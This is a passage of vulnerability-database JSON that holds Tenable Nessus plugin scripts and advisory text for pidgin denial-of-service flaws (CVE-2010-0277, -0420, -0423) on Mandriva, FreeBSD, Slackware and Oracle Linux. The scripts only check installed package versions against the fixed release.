"cpe:/o:mandriva:linux:2010.0", "p-cpe:/a:mandriva:linux:pidgin-client", "p-cpe:/a:mandriva:linux:libfinch0", "p-cpe:/a:mandriva:linux:pidgin-gevolution", "p-cpe:/a:mandriva:linux:finch", "p-cpe:/a:mandriva:linux:pidgin-perl", "p-cpe:/a:mandriva:linux:pidgin-silc", "p-cpe:/a:mandriva:linux:pidgin-meanwhile", "p-cpe:/a:mandriva:linux:libpurple-devel", "p-cpe:/a:mandriva:linux:pidgin-i18n"], "id": "MANDRIVA_MDVSA-2010-041.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44664", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2010:041. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44664);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/19 20:59:16\");\n\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(38294);\n script_xref(name:\"MDVSA\", value:\"2010:041\");\n\n script_name(english:\"Mandriva Linux Security Advisory : pidgin (MDVSA-2010:041)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security vulnerabilities has been identified and fixed in\npidgin :\n\nCertain malformed SLP messages can trigger a crash because the MSN\nprotocol plugin fails to check that all pieces of the message are set\ncorrectly (CVE-2010-0277).\n\nIn a user in a multi-user chat room has a nickname containing '<br>'\nthen libpurple ends up having two users with username ' ' in the room,\nand Finch crashes in this situation. We do not believe there is a\npossibility of remote code execution (CVE-2010-0420).\n\noCERT notified us about a problem in Pidgin, where a large amount of\nprocessing time will be used when inserting many smileys into an IM or\nchat window. This should not cause a crash, but Pidgin can become\nunusable slow (CVE-2010-0423).\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers.\n\nThis update provides pidgin 2.6.6, which is not vulnerable to these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://pidgin.im/news/security/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64finch0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64purple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64purple0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfinch0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpurple0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-bonjour\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-gevolution\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-meanwhile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-mono\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-silc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pidgin-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"finch-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64finch0-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64purple-devel-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64purple0-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libfinch0-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpurple-devel-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpurple0-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"pidgin-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"pidgin-bonjour-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"pidgin-client-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"pidgin-gevolution-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"pidgin-i18n-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"pidgin-meanwhile-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"pidgin-mono-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"pidgin-perl-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"pidgin-plugins-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"pidgin-silc-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"pidgin-tcl-2.6.6-0.1mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", reference:\"finch-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64finch0-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64purple-devel-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64purple0-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libfinch0-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpurple-devel-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libpurple0-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-bonjour-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-client-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-gevolution-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-i18n-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-meanwhile-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-mono-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-perl-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-plugins-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-silc-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pidgin-tcl-2.6.6-0.1mdv2009.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.0\", reference:\"finch-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64finch0-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64purple-devel-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64purple0-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libfinch0-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libpurple-devel-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libpurple0-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"pidgin-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"pidgin-bonjour-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"pidgin-client-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"pidgin-gevolution-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"pidgin-i18n-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"pidgin-meanwhile-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"pidgin-mono-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"pidgin-perl-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"pidgin-plugins-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"pidgin-silc-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"pidgin-tcl-2.6.6-0.1mdv2010.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:40:53", "references": ["http://pidgin.im/news/security/?id=44", "http://pidgin.im/news/security/?id=43", "http://www.nessus.org/u?57dc86e8", "http://pidgin.im/news/security/?id=45"], "pluginID": "45585", "edition": 3, "description": "Three denial of service vulnerabilities where found in pidgin and allow remote attackers to crash the application. The developers summarized these problems as follows :\n\nPidgin can become unresponsive when displaying large numbers of smileys\n\nCertain nicknames in group chat rooms can trigger a crash in Finch\n\nFailure to validate all fields of an incoming message can trigger a crash", "reporter": "Tenable", "published": "2010-04-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "FreeBSD : pidgin -- multiple remote denial of service vulnerabilities (a2c4d3d5-4c7b-11df-83fb-0015587e2cc1)", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "cpe": ["p-cpe:/a:freebsd:freebsd:libpurple", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:pidgin"], "modified": "2016-12-08T00:00:00", "id": "FREEBSD_PKG_A2C4D3D54C7B11DF83FB0015587E2CC1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=45585", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2016 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(45585);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:42:12 $\");\n\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(38294);\n\n script_name(english:\"FreeBSD : pidgin -- multiple remote denial of service vulnerabilities (a2c4d3d5-4c7b-11df-83fb-0015587e2cc1)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three denial of service vulnerabilities where found in pidgin and\nallow remote attackers to crash the application. The developers\nsummarized these problems as follows :\n\nPidgin can become unresponsive when displaying large numbers of\nsmileys\n\nCertain nicknames in group chat rooms can trigger a crash in Finch\n\nFailure to validate all fields of an incoming message can trigger a\ncrash\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://pidgin.im/news/security/?id=43\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://pidgin.im/news/security/?id=44\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://pidgin.im/news/security/?id=45\"\n );\n # http://www.freebsd.org/ports/portaudit/a2c4d3d5-4c7b-11df-83fb-0015587e2cc1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?57dc86e8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/04/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"pidgin<2.6.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"libpurple<2.6.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:34:46", "references": ["http://www.nessus.org/u?0e7adbdf"], "pluginID": "45024", "edition": 3, "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, 13.0, and -current to fix denial of service issues.", "reporter": "Tenable", "published": "2010-03-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "Slackware 12.0 / 12.1 / 12.2 / 13.0 / current : pidgin (SSA:2010-069-01)", "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "cpe": ["cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:12.2", "cpe:/o:slackware:slackware_linux:13.0", "p-cpe:/a:slackware:slackware_linux:pidgin", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:12.1"], "modified": "2016-12-09T00:00:00", "id": "SLACKWARE_SSA_2010-069-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=45024", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2010-069-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(45024);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2016/12/09 20:54:58 $\");\n\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(38294);\n script_xref(name:\"SSA\", value:\"2010-069-01\");\n\n script_name(english:\"Slackware 12.0 / 12.1 / 12.2 / 13.0 / current : pidgin (SSA:2010-069-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New pidgin packages are available for Slackware 12.0, 12.1, 12.2,\n13.0, and -current to fix denial of service issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.458630\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0e7adbdf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"12.0\", pkgname:\"pidgin\", pkgver:\"2.6.6\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"pidgin\", pkgver:\"2.6.6\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"pidgin\", pkgver:\"2.6.6\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"13.0\", pkgname:\"pidgin\", pkgver:\"2.6.6\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"pidgin\", pkgver:\"2.6.6\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"pidgin\", pkgver:\"2.6.6\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"pidgin\", pkgver:\"2.6.6\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-07-21T07:43:32", "references": ["https://oss.oracle.com/pipermail/el-errata/2010-February/001363.html"], "pluginID": "68001", "description": "From Red Hat Security Advisory 2010:0115 :\n\nUpdated pidgin packages that fix three security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol implementation handled MSNSLP invitations. A remote attacker could send a specially crafted INVITE request that would cause a denial of service (memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat implementation, when using multi-user chat. If a Finch user in a multi-user chat session were to change their nickname to contain the HTML 'br' element, it would cause Finch to crash. (CVE-2010-0420)\n\nRed Hat would like to thank Sadrul Habib Chowdhury of the Pidgin project for responsibly reporting the CVE-2010-0420 issue.\n\nA denial of service flaw was found in the way Pidgin processed emoticon images. A remote attacker could flood the victim with emoticon images during mutual communication, leading to excessive CPU use. (CVE-2010-0423)\n\nThese packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin release notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users are advised to upgrade to these updated packages, which correct these issues. Pidgin must be restarted for this update to take effect.", "edition": 4, "reporter": "Tenable", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : pidgin (ELSA-2010-0115)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2018-07-18T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:pidgin", "p-cpe:/a:oracle:linux:libpurple-devel", "p-cpe:/a:oracle:linux:finch", "p-cpe:/a:oracle:linux:pidgin-perl", "p-cpe:/a:oracle:linux:libpurple", "p-cpe:/a:oracle:linux:libpurple-tcl", "p-cpe:/a:oracle:linux:finch-devel", "p-cpe:/a:oracle:linux:libpurple-perl", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:pidgin-devel"], "id": "ORACLELINUX_ELSA-2010-0115.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68001", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory 